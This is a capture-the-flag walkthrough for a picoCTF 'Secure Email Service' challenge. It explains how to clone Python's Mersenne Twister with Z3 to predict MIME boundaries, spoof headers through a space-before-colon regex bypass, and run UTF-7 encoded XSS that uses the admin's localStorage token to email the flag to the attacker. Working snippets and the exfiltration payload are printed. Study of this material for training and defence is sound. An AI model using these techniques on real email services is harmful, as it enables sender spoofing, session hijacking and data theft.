challenges April 1, 2026 20 min read

CTF Walkthrough: Secure Email Service

Platform: picoCTF 2025
Category: Web / Cryptography
Difficulty: Hard

TL;DR

We exploit three chained vulnerabilities:

Predict MIME boundaries via insecure RNG (MT19937)
Inject malicious headers via regex bypass (space before colon)
Execute XSS via UTF-7 encoding in signed emails

Result: Admin bot emails us the flag

Secure Email Service: Comprehensive Technical Deep Dive & Exploit Analysis

Introduction

Secure Email Service (aka "Activist Birds") is a hard web/crypto challenge. It's basically a microservices app mimicking a secure comms platform. It's got a FastAPI backend, some custom MIME handling in Python, Jinja2, and a headless Chrome bot (Playwright).

While the stack itself is standard, the way it's glued together creates some massive holes.

Figure 1: High-level architecture showing the flaw in the Trust Model where signed emails bypass safety checks.

The main issue here is Trust. The app makes three fatal assumptions:

Signed = Safe: It assumes if a message is signed, it's safe to render as HTML.
Random = Secure: It trusts Python's default RNG (random) for crypto-critical boundaries.
Regex = Firewall: It trusts a simple regex to filter headers, which is... optimistic.

We're going to break all three. We'll chain Insecure Randomness, Header Injection, and XSS (via UTF-7) to run our own JavaScript in the admin bot's browser.

1. Component Analysis & Code Dissection

A. The Backend Logic (`main.py`)

main.py is where the logic lives. The really interesting part is how it handles email generation in /api/send.

The Vulnerable Endpoint: `/api/send`

It splits handling based on whether you have keys or not.

Regular Users: No keys? You get the "sandbox" — plain text only. Safe.
Admins: Have keys? You get the "premium" treatment — signed HTML.

The bug is subtle but deadly: it trusts the Subject line.

@app.post('/api/send')
async def send(
    user: Annotated[User, Depends(db.request_user)],
    to: Annotated[str, Body()],
    subject: Annotated[str, Body()],
    body: Annotated[str, Body()]
):
    # 1. Recipient Validation
    # The system verifies if the target exists in the database.
    recipient = db.get_user(to)
    if not recipient:
        raise HTTPException(status_code=404, detail="Recipient not found")
    
    # 2. Privilege Check & Message Construction
    # The code branches here based on the cryptographic identity of the sender.
    
    # Scenario A: Regular User (Unsigned, Plaintext)
    # If the user lacks a public key, the system defaults to a safe, plaintext format.
    # This acts as a "Sandbox" for unprivileged users.
    if len(user.public_key) == 0:
        msg = util.generate_email(
            sender=user.username,
            recipient=recipient.username,
            subject=subject,
            content=body,
        )
    
    # Scenario B: Admin/Privileged User (Signed, HTML Rendered)
    # If the user possesses keys (like the Admin), the system enables dangerous features.
    # It assumes "Admin = Safe", a classic privilege fallacy.
    else:
        msg = util.generate_email(
            sender=user.username,
            recipient=recipient.username,
            subject=subject,
            content=template.render(
                title=subject,   # <--- THE ROOT CAUSE OF REFLECTION
                content=body
            ),
            html=True,        # Enables HTML rendering for the body
            sign=True,        # Applies cryptographic signature
            cert=user.public_key,
            key=user.private_key
        )

    # 3. Storage
    # The constructed MIME message is serialized to a string and stored.
    email_id = db.store_email(recipient.id, msg.as_string())
    return email_id

What's happening here?

Trust Dichotomy: It assumes "Signed = Safe HTML". This is a Signing Oracle. If we can trick the admin into signing our text, it becomes trusted HTML.
The Reflection: content=template.render(title=subject...). This is the kill shot. When an admin replies, the Subject of the original email (which we control) gets injected into the title variable. If we put garbage in the subject, it ends up in the admin's signed HTML body.

Figure 1a: The Trust Dichotomy and Reflection Point logic flaw.

The sketch above illustrates the critical logic flaw in main.py. The application splits its rendering logic based on privilege. Regular users are safely sandboxed in plaintext, but the Admin path (right side) trusts the content as HTML. The "Reflection Point" highlighted in the diagram shows where our malicious input (the Subject line) is injected directly into the Jinja2 template, bypassing the safety checks intended for the body content.

B. The Cryptographic Weakness (`util.py`)

This utility acts as a wrapper around Python's standard email library. While it seems functional and innocuous, it inherits a default behavior from the standard library that proves fatal for the system's security posture when used in a cryptographic or security-critical context.

import smail
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText  # needed by the MIMEText(...) calls below
# ...

def generate_email(sender, recipient, subject, content, html=False, sign=False, cert=None, key=None):
    # Initializes a multipart email container
    # Vulnerability: Uses default RNG for boundary generation without overrides
    msg = MIMEMultipart() 
    
    msg['From'] = sender
    msg['To'] = recipient
    msg['Subject'] = subject
    
    if html:
        msg.attach(MIMEText(content, 'html'))
    else:
        msg.attach(MIMEText(content, 'plain'))

    # ... S/MIME signing logic ...

Deep Analysis of util.py & Python's email Library:

MIME Structure & Boundaries: Multipart emails function by using a "boundary" string to separate different content types (e.g., multipart/alternative separating plaintext from HTML, or multipart/mixed for attachments). The structure dictates that the boundary must be unique enough not to appear in the content itself. The format generally looks like this:
```
Content-Type: multipart/mixed; boundary="===============123456789=="

--===============123456789==
Content-Type: text/plain

--===============123456789==--
```
If an attacker can predict this boundary, they can inject their own boundaries into the message body, confusing the parser into treating malicious payloads (like HTML scripts) as valid, separate MIME parts.
The Hidden RNG Call: MIMEMultipart() is created without a boundary argument, so no boundary exists until the message is serialized (msg.as_string() in main.py). At that point the email generator calls its internal helper email.generator.Generator._make_boundary(), which calls random.randrange(sys.maxsize) to produce the digits of the boundary. This implicit behavior is often overlooked by developers who assume libraries handle security defaults correctly.
The Algorithm (MT19937): Python's random module relies on the Mersenne Twister (MT19937) Pseudo-Random Number Generator (PRNG). While MT19937 is excellent for Monte Carlo simulations due to its extremely long period ($2^{19937}-1$) and equidistribution properties, it is cryptographically insecure. It is purely deterministic. Its internal state consists of a vector of 624 32-bit integers. If an attacker recovers this state vector by observing enough outputs (in this case, 624 32-bit chunks), they can clone the generator and predict every future number it will produce with 100% accuracy. This predictability allows an attacker to know exactly what boundary string the admin bot will use before the bot even generates the email.
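
The link between the boundary and the global RNG can be checked locally. The following is a minimal sketch, assuming CPython's stock email package; the helper name boundary_for_seed and the seed value are ours for illustration and are not part of the challenge code.

```python
import random
import sys
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText


def boundary_for_seed(seed):
    """Serialize a fresh multipart message and return the boundary it received."""
    random.seed(seed)                       # pin the global Mersenne Twister state
    msg = MIMEMultipart()                   # no boundary has been chosen yet
    msg.attach(MIMEText("hello", "plain"))
    msg.as_string()                         # serialization triggers boundary creation
    return msg.get_boundary()


# Independently ask the same seeded generator for its first randrange() value.
random.seed(1337)
expected_token = random.randrange(sys.maxsize)

boundary = boundary_for_seed(1337)
token = int(boundary.strip("="))            # the digits between the '=' padding

print(boundary)
print(token == expected_token)              # the boundary digits ARE the RNG output
```

If the two values match on your interpreter, every boundary the server emits is a direct sample of its random state.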

Figure 1b: The predictable boundary generation mechanism using an insecure RNG.

This diagram visualizes the supply chain of the email boundary. The function MIMEMultipart() implicitly relies on random.randrange() to generate the boundary string. As shown, an attacker can act as an observer, collecting these boundaries ('Boundary 1', 'Boundary 2') to reverse-engineer the internal state of the generator. Once the state is cloned, the attacker can predict future values ('Boundary 3') with perfect accuracy, breaking the uniqueness assumption the email parser relies on.
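
To make "cloning the state" concrete, here is a sketch of the classic recovery when all 624 outputs are complete 32-bit words. This is the easy case that randcrack-style tools handle, not the truncated case this challenge presents; the function names are ours.

```python
import random


def _undo_right(y, shift):
    """Invert y ^= y >> shift on a 32-bit word."""
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ (x >> shift)
    return x


def _undo_left(y, shift, mask):
    """Invert y ^= (y << shift) & mask on a 32-bit word."""
    x = y
    for _ in range(32 // shift + 1):
        x = (y ^ ((x << shift) & mask)) & 0xFFFFFFFF
    return x


def untemper(y):
    """Reverse MT19937's output tempering, last step first."""
    y = _undo_right(y, 18)
    y = _undo_left(y, 15, 0xEFC60000)
    y = _undo_left(y, 7, 0x9D2C5680)
    y = _undo_right(y, 11)
    return y


def clone_from_outputs(outputs):
    """Build a random.Random whose future output matches the observed generator."""
    if len(outputs) != 624:
        raise ValueError("need exactly 624 consecutive 32-bit outputs")
    # Index 624 tells CPython to regenerate the state block on the next draw.
    state = tuple(untemper(o) for o in outputs) + (624,)
    clone = random.Random()
    clone.setstate((3, state, None))
    return clone


victim = random.Random(2025)                          # stands in for the server
observed = [victim.getrandbits(32) for _ in range(624)]
clone = clone_from_outputs(observed)
print(clone.randrange(2**63 - 1) == victim.randrange(2**63 - 1))
```

The challenge is harder only because the observer never gets clean 32-bit words, which is where the solver-based approach comes in.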

C. The Victim Simulation (`admin_bot.py`)

The bot is a Python script using Playwright to control a headless browser instance (Chromium). It simulates the admin's interaction with the web interface to process user emails. Analyzing this script reveals the precise "User Interaction" sequence required to trigger the XSS payload.

# Login Process
await page.goto('http://127.0.0.1:8000')
# Crucial: The flag is injected into the browser's LocalStorage here.
await page.evaluate('flag => localStorage.setItem("flag", flag)', flag)
# ... enters credentials ...

# Interaction Loop
# 1. Navigates to Inbox
# Networkidle ensures all API calls have finished loading.
await page.wait_for_url('http://127.0.0.1:8000/inbox.html', wait_until='networkidle')

# 2. Opens the FIRST email
# This predictable behavior allows us to "stack" the inbox.
await page.click('tbody tr', timeout=1000)

# 3. Clicks Reply
# This triggers the reflection vulnerability in main.py
await page.click('#reply button')

# 4. Sends Reply
await page.type('textarea', 'We\'ve gotten your message...')
await page.click('#reply button')

# 5. Cleanup
await browser.close()

Deep Analysis of admin_bot.py:

The "Kill Chain" Trigger: The bot always opens the top-most email in the inbox (page.click('tbody tr') clicks the first matching row). This lets us "stack the deck": we send the malicious email right before triggering the bot via the API, so ours is the message it processes.
The Self-Reply Mechanism: When the bot clicks "Reply", the backend logic in main.py is triggered. Crucially, the "Reply" function automatically populates the recipient field using the sender address of the email being viewed. If the incoming email's From header says admin@ses, the bot (logged in as admin) effectively replies to itself. This circular logic is vital for the exploit: we need the admin to sign something and send it back to a place where the admin will read it again (the admin's own inbox).
Local Storage as the Vault: The script explicitly places the flag into localStorage. This confirms that our XSS payload must access localStorage to retrieve the loot (localStorage.getItem('flag')). This differs from traditional cookie theft and requires JavaScript execution within the origin's context.
Race Condition Potential: The script closes the browser immediately after sending the reply (await browser.close()). This creates a significant race condition for any asynchronous network requests (like standard fetch or XMLHttpRequest) we inject. If the browser closes before the request completes (TCP handshake + data transmission), the connection is severed, and we lose the exfiltrated data. This necessitates the use of keepalive: true, navigator.sendBeacon, or synchronous requests (async: false) in the final payload to force the browser to complete the transmission before termination.

Figure 2a: Visualizing the Admin Bot's predictable behavior loops and race condition risks.

Understanding the Admin Bot's Behavior (Figure 2a)

The diagram above illustrates the predictable cycle of the admin bot and the technical hurdles we must overcome:

Bot opens Inbox: The bot is programmed to always click the very first email in its inbox. This predictability is our "entry point"—we can ensure our malicious email is the one processed by sending it just seconds before triggering the bot.
Self-Reply Loop: This is the core of the reflection attack. By spoofing the From header to be admin@ses (using the space-before-colon trick), we trick the bot into replying to itself. This results in a new, signed email appearing at the top of the admin's inbox, which the bot will then open in its next run.
Execution: Once the bot opens the signed reply, our XSS payload (hidden via UTF-7) is rendered. Because the email is signed, the application treats it as "safe" and renders it as HTML, so our JavaScript executes. This script then reaches into localStorage where the flag is stored.
Race Condition: This is the final challenge. The bot script closes the browser almost immediately after sending its reply.
- Path A (Failure): A standard "Asynchronous" request (like a normal fetch) might be cut off before it can finish sending the flag.
- Path B (Success): By using a "Synchronous" request or specific flags like keepalive: true, we force the browser to stay open long enough to ensure the flag "escapes" to our server before the process terminates.

2. Vulnerability Analysis & Exploitation Theory

1. Cracking the Random Number Generator (The 64-bit Problem)

To inject a custom MIME structure into the email, we must ensure our injected body uses the exact same boundary string that the server generates for the header. If there is a mismatch between the header boundary and the body boundary, the email client will fail to parse the body correctly, rendering our payload inert. This requires predicting the output of random.randrange(sys.maxsize).

Architecture Context: The challenge runs on a 64-bit system. In Python 3 on 64-bit Linux, sys.maxsize is $2^{63}-1$ (approx. 9.22 quintillion).
MT19937 Limitations: The Mersenne Twister generates 32-bit numbers natively. It cannot produce a 64-bit integer in a single operation. This creates a complexity that standard 32-bit cracking tools (like the standard randcrack library) cannot handle out of the box.
Python's Generation Logic: sys.maxsize has a bit length of 63, so randrange(sys.maxsize) asks the generator for 63 random bits. CPython's getrandbits assembles them from two 32-bit outputs:
- Generate 32 random bits ($A$) - These become the lower 32 bits.
- Generate 32 random bits ($B$) - Only the top 31 bits are kept ($B \gg 1$); they become the upper bits.
- Shift the truncated value left by 32 bits.
- Combine them via bitwise OR: ($A | ((B \gg 1) \ll 32)$).
Truncation: Because only 63 bits are needed, the least significant bit of $B$ is dropped before the halves are combined, so the result always fits in sys.maxsize's 63 bits and the attacker never sees that bit.
The Recovery Challenge: Standard tools like randcrack expect contiguous, clean 32-bit outputs to reverse the tempering matrix. Here, we receive "polluted" 63-bit chunks where 1 bit (the LSB of the second 32-bit generation) is discarded and therefore unknown. This loss of information breaks deterministic reversal algorithms.
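
The composition of a boundary token from two generator outputs can be verified directly. A small sketch, assuming CPython (where getrandbits(63) keeps the first 32-bit word whole and shifts the second right by one); N is written out explicitly so the snippet does not depend on the platform's sys.maxsize.

```python
import random

N = 2**63 - 1  # sys.maxsize on 64-bit CPython


def rebuild_from_words(first, second):
    """Combine two raw 32-bit MT19937 outputs the way getrandbits(63) does."""
    return first | ((second >> 1) << 32)   # the lowest bit of `second` is lost


a_gen = random.Random(42)
b_gen = random.Random(42)                  # identical twin of a_gen

value = a_gen.randrange(N)                 # what the boundary digits encode
first = b_gen.getrandbits(32)              # raw word 1 -> low 32 bits
second = b_gen.getrandbits(32)             # raw word 2 -> high 31 bits

print(value == rebuild_from_words(first, second))
```

So each observed boundary pins down 63 of the 64 bits the generator produced for it.
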

The Z3 Fix

Brute-forcing the missing bits is too slow. We use Z3 (Microsoft's Theorem Prover).
We simulate the MT19937 state vector (624 32-bit integers) symbolically.
We tell Z3: "Here's a 63-bit output. It was made by taking two 32-bit chunks, dropping one bit of the second, shifting it, and combining them."
We feed it enough samples (about 320 emails) to constrain the solver.
Z3 solves the resulting system of bit-level equations to recover the generator's internal state.

Figure 2: Visualizing the 64-bit splitting technique to recover the 32-bit MT19937 internal state with Z3.

How we crack the 64-bit RNG (Figure 2)

The image above breaks down the process of turning semi-random server data back into a predictable sequence:

Split & Mask (The Input): We start with the 63-bit numbers we get from the server (the digits inside the boundary strings). As described earlier, Python makes these by gluing two 32-bit outputs together. We "Split" these back into their two halves. Crucially, one bit of the second half is marked with a '?' in the diagram because Python discards it before the value ever leaves the server.
Z3 Solver (The Brain): We feed these incomplete 32-bit chunks into the Z3 Solver. Instead of trying to guess the missing bits (which would take forever), Z3 treats the entire RNG process as a series of logic gates (represented by the AND, OR, and XOR symbols in the "Z3 Solver" box). It works backward through these gates to find the only possible numbers that could have created the outputs we saw.
Recovered State (The Vector): Once Z3 has enough samples, it fills in the 624-word state vector. This is the internal memory of the server's Mersenne Twister. With all 624 numbers recovered, we now have a perfect clone of the server's RNG.
Synchronization (The Result): The waves at the bottom represent us aligning our local generator with the server's generator. Once the "frequencies" match, we can predict every future boundary string with 100% accuracy, allowing us to build a payload that fits perfectly into the admin's next email.

2. Header Injection (Bypassing Regex Filters)

The application attempts to act as a firewall for email headers, preventing "Header Injection" (where an attacker adds newlines to overwrite headers like From or Content-Type) using a Regex filter. This is a common defense against spam relay attacks.

The Defense: re.compile(r'\n[^ \t]+:')
This regex matches a Newline character (\n), followed immediately by one or more characters that are neither a space nor a tab ([^ \t]+), followed by a colon (:). It is designed to catch standard injection attempts like \nFrom: or \nCc:.
The Bypass: \nFrom : admin@ses
The Logic: By inserting a single space before the colon, the character sequence becomes: Newline -> F -> r -> o -> m -> Space -> Colon.
The Failure: The regex looks for [^ \t]+ (NOT space or tab). The space character fails this check, causing the regex match to fail entirely. The filter assumes valid headers must not have spaces before the colon.
The Parser: While the regex rejects From:, the parser that later reads the message follows Postel's Law (Robustness Principle: "be liberal in what you accept"). The obsolete header syntax in RFC 5322 tolerates whitespace between the field name and the colon, so a lenient parser treats From : the same as From:. This leniency allows us to spoof the sender as admin@ses, setting the stage for the reflection attack.
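
The filter's blind spot is easy to reproduce. A minimal sketch using the regex quoted above; how the application applies it (here, a search over the whole value) and the helper name is_blocked are assumptions.

```python
import re

# The pattern quoted in the write-up.
HEADER_FILTER = re.compile(r'\n[^ \t]+:')


def is_blocked(value):
    """Return True if the filter would flag this header value as an injection."""
    return HEADER_FILTER.search(value) is not None


print(is_blocked("hello\nFrom: admin@ses"))    # True  (classic injection is caught)
print(is_blocked("hello\nFrom : admin@ses"))   # False (one space defeats the filter)
```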

3. XSS via UTF-7 (Bypassing Sanitization)

Jinja2's autoescaping neutralizes standard XSS vectors: a literal <script> or <img onerror=...> in the subject has its < and > turned into harmless HTML entities before it reaches the page. However, we can leverage legacy encoding support to smuggle our payload past this escaping.

The Vector: UTF-7 (7-bit Unicode Transformation Format) is an obsolete variable-width encoding that was designed for passing Unicode characters over ASCII-only mail gateways (SMTP).
The Mechanism: In UTF-7, special characters like < and > (which are essential for HTML tags) are encoded as ASCII sequences using + as an escape character.
- < becomes +ADw-
- > becomes +AD4-
- " becomes +ACI-
The Trigger: We inject the header Content-Type: text/html; charset=utf-7 via our header injection vulnerability. This instructs the rendering engine (the admin bot's browser) to decode the body using UTF-7 rules instead of standard UTF-8.
The Execution: A payload like +ADw-script+AD4- is rendered by the browser as <script>.
- Why it bypasses Jinja2: The Jinja2 template engine auto-escapes special HTML characters (like < and >) to prevent XSS. However, our UTF-7 payload consists entirely of safe ASCII characters (+, -, letters). Jinja2 sees nothing to escape and renders the string literally. The browser then performs the UTF-7 decoding after receiving the page, turning the safe ASCII back into executable HTML tags.
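
The encoding trick can be reproduced with the standard library. In this sketch, utf7_escape and utf7_hide are hypothetical helpers of ours, and html.escape stands in for Jinja2's autoescaping (an assumption: both escape &, <, > and quotes). Python's own utf-7 decoder plays the role of the client-side decoder.

```python
import base64
import html


def utf7_escape(ch):
    """Encode one character as a UTF-7 shift sequence: '+' base64(UTF-16BE) '-'."""
    b64 = base64.b64encode(ch.encode("utf-16-be")).decode("ascii").rstrip("=")
    return "+" + b64 + "-"


def utf7_hide(text, specials='<>"'):
    """Escape only the characters an HTML escaper would touch."""
    return "".join(utf7_escape(c) if c in specials else c for c in text)


hidden = utf7_hide("<script>")
print(hidden)                                   # +ADw-script+AD4-
print(html.escape(hidden) == hidden)            # True: nothing left to escape
print(hidden.encode("ascii").decode("utf-7"))   # <script>
```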

3. The Exploit Chain: Execution Protocol

Figure 3: The complete exploit flow.

Phase 1: State Recovery

Login: Get a session.
Spam: Send ~320 emails to yourself.
Extract: Get the boundary strings from those emails.
Solve: Feed the boundaries to Z3. Z3 gives us the RNG state.
Sync: Spin a local PRNG to match the server's state. Now we know the future.
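
The "Extract" step can be sketched as follows. The regex assumes the boundary format Python's email generator emits (15 equals signs, zero-padded digits, two equals signs); how the raw email text is fetched from the API is not shown, and the function names are ours.

```python
import re

# Matches: boundary="===============<digits>=="
BOUNDARY_RE = re.compile(r'boundary="=+(\d+)=="')


def boundary_token(raw_email):
    """Pull the integer that randrange(sys.maxsize) produced out of a raw email."""
    match = BOUNDARY_RE.search(raw_email)
    if match is None:
        raise ValueError("no generated boundary found")
    return int(match.group(1))


def split_token(token):
    """Split a 63-bit token into the pieces each raw 32-bit output contributed."""
    low32 = token & 0xFFFFFFFF     # first MT19937 output, complete
    high31 = token >> 32           # second output with its lowest bit missing
    return low32, high31


sample = 'Content-Type: multipart/mixed; boundary="===============1234567890123456789=="'
low32, high31 = split_token(boundary_token(sample))
print(hex(low32), hex(high31))
```

Each pair (low32, high31) then becomes one set of constraints for the solver.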

Phase 2: Payload Construction (Engineering)

Figure 4: Detailed view of the low-level bypass techniques (Regex & UTF-7) and the Race Condition solution.

We need to inject a malicious MIME body into the Subject field because the subject is reflected into the email body. This requires solving multiple constraints simultaneously.

Constraint A: UTF-7 vs. Base64 Collision. We need to execute complex JavaScript (fetch, localStorage, etc.). Using eval(atob('BASE64')) is standard to avoid character restrictions. However, Base64 encoding uses + and =. In UTF-7, + is an escape character. If our Base64 string contains +, the decoder will treat the characters after it as a UTF-7 shift sequence, corrupting the script.

Solution: We sanitize the Base64 string before injection.
- Replace + with +- (The UTF-7 escape sequence for a literal plus sign).
- Replace = with +AD0- (The UTF-7 encoded equals sign).
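
A sketch of that sanitization step, with a round trip through Python's utf-7 decoder as a sanity check. The helper name utf7_escape_base64 and the sample JavaScript string are illustrative only.

```python
import base64


def utf7_escape_base64(b64):
    """Make a Base64 string survive UTF-7 decoding unchanged."""
    # Order matters: escape '+' first, because the '=' replacement adds new '+' signs.
    return b64.replace("+", "+-").replace("=", "+AD0-")


js = "console.log('placeholder payload')"          # stand-in for the real script
b64 = base64.b64encode(js.encode("utf-8")).decode("ascii")
safe = utf7_escape_base64(b64)

# After the client decodes UTF-7, atob() must see the original Base64 text.
print(safe.encode("ascii").decode("utf-7") == b64)
```

Swapping the two replace calls would double-escape the + inside +AD0- and corrupt the output.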

Constraint B: Boundary Collision (.0 Append). Python's email library is smart. When it generates a boundary at serialization time, it checks whether that exact string already appears as a boundary line in the message text (which we are injecting). If it does, the library treats it as a collision and appends .0 to the header boundary to preserve the structure. This mismatch breaks our spoofed MIME structure.

Solution: We add a space before the boundary in our injected body, so the line reads " --===============..." instead of "--===============...". The library's collision check regex (^--) expects the boundary at the absolute start of the line. The space bypasses this check. However, the receiving MIME parser ignores the indentation and accepts the boundary as valid.
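
Both behaviors can be observed locally with CPython's email package. In this sketch a fixed seed stands in for "we already cloned the server's RNG"; the helper names and the seed are ours.

```python
import random
import sys
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

SEED = 7  # assumption: plays the role of the recovered server state


def predicted_boundary(seed):
    """Reproduce the boundary the library will generate next for this seed."""
    random.seed(seed)
    token = random.randrange(sys.maxsize)
    width = len(repr(sys.maxsize - 1))
    return "=" * 15 + str(token).zfill(width) + "=="


def header_boundary(body, seed):
    """Serialize a message with the given body and return the boundary actually used."""
    random.seed(seed)
    msg = MIMEMultipart()
    msg.attach(MIMEText(body, "html"))
    msg.as_string()
    return msg.get_boundary()


guess = predicted_boundary(SEED)
collided = header_boundary(f"<p>a</p>\n--{guess}\n<p>b</p>", SEED)
evaded = header_boundary(f"<p>a</p>\n --{guess}\n<p>b</p>", SEED)

print(collided == guess + ".0")   # boundary at line start: library dodges with ".0"
print(evaded == guess)            # one leading space: collision check never fires
```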

Constraint C: The DOM Restriction (ShadowDOM). The email content is likely rendered inside a ShadowDOM using element.innerHTML = content. The HTML5 specification dictates that <script> tags inserted via innerHTML do not execute for security reasons.

Solution: We use <img src=x onerror=...>. The onerror event handler is not subject to the innerHTML restriction. It fires immediately upon the inevitable 404 error of loading the non-existent image "x", executing our payload.

Constraint D: Network Isolation (Egress Filtering). The bot runs in a Docker container that likely restricts outbound traffic via egress filtering. It cannot connect to external services like webhook.site.

Figure 5: Bypassing the firewall by forcing the bot to email the flag internally instead of connecting to the internet.

Solution: Internal Exfiltration. We force the bot to make an API call to localhost (or the internal API gateway) that sends an email containing the flag to us (user@ses). We leverage the bot's own credentials (the token in localStorage).

The Final Javascript Payload Logic:

// Example logic of the payload
var xhr = new XMLHttpRequest();
// Using Synchronous XHR (async: false) or keepalive to handle race conditions
// This ensures the browser waits for the network request to finish before closing.
xhr.open('POST', '/api/send', false); 

// Authenticating the request using the Admin's token found in localStorage.
// Without this header, the API would reject the request as Unauthorized (401).
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.setRequestHeader('token', localStorage.getItem('token')); 

xhr.send(JSON.stringify({
    to: 'user@ses', // We send the loot to our own inbox
    subject: 'FLAG_DELIVERY',
    body: localStorage.getItem('flag') // The target data
}));

Phase 3: The Double Trigger (The Execution)

Injection: We send an email to admin@ses (spoofed) with the Header Injection payload in the Subject line. The payload contains the predicted future boundary and the UTF-7 encoded XSS vector.
Trigger 1 (Signing): We call /api/admin_bot.
- The bot logs in.
- It sees our email (appearing to be from admin@ses).
- It clicks "Reply".
- The backend generates a signed email, reflecting our malicious subject into the HTML body. It uses the boundary we predicted.
Wait: We pause for 5-10 seconds to allow the backend database to process and store this new signed email. This avoids race conditions where the bot checks the inbox before the reply is saved.
Trigger 2 (Execution): We call /api/admin_bot again.
- The bot logs in.
- It sees the Signed Reply (sent by itself during Trigger 1) at the top of the inbox.
- It opens it. Since the email is signed, the system trusts it and renders it as HTML.
- The browser respects the charset=utf-7 header we injected.
- It executes the <img onerror> payload.
- The JavaScript creates a synchronous request to the internal API (or external webhook if available).
- The flag is emailed to user@ses.

4. Full Exploit Implementation

This script automates the full exploit chain to exfiltrate the flag. It leverages the Z3 solver to crack the server's PRNG, constructs a UTF-7 encoded XSS payload that bypasses Jinja2 escaping, and uses header injection to spoof the sender. By triggering the admin bot twice, we force the system to sign our payload and then execute it, sending the flag directly to our inbox.

Figure 5a: The logical flow of the Python exploit script.

How the Exploit Works

The flowchart above (Figure 5a) acts as a blueprint for the exploit. It shows exactly how the Python code moves from one step to the next to steal the flag. Here is a simple breakdown of the main phases:

1. Phase 1: Information Gathering (The "Math Magic" Phase)

Step 1 (login): The script logs in as a normal user to get a "session token" (like a temporary ID card).
Step 2 (The Loop): The script collects "boundary" samples (the random ID numbers) by sending about 320 emails to itself, enough to cover the 624 32-bit words of the generator's state.
Step 3 (Z3 Solver): It uses a smart math tool called Z3 to learn the secret "DNA" of the server's random number generator. This allows the script to recover the r2 State and predict any future random number.
Step 4 (Sync Check): The script verifies its predictions. If the math matches the server, it moves to the attack.

2. Phase 2: Setting the Trap (The Crafting Phase)

Step 5 (Craft Payload): The script calculates the future ID number the Admin will use. It then builds a "trap" email using UTF-7 (to hide code) and Header Injection (to fake its identity).
Step 6 (s.post): The script sends the trap email to the admin@ses.

3. Phase 3: The Attack (The "Double Trigger" Phase)

Step 7 (Trigger 1): The script tells the Admin Bot to check its mail. The bot sees our email, clicks "Reply," and the server Signs our hidden code with the Admin's official signature.
Step 8 (Wait): The script waits for 10 seconds to make sure the server has finished saving the new signed email.
Step 9 (Trigger 2): The script tells the Admin Bot to check its mail again. The bot opens its own reply. Because it is signed, the browser runs our hidden XSS code.

4. Final Result: The Loot

The hidden code makes the Admin's browser email the Flag to our own account (user@ses). You check your inbox, and the flag is there!

Figure 6: Successful execution of the exploit script, recovering the flag from the admin bot.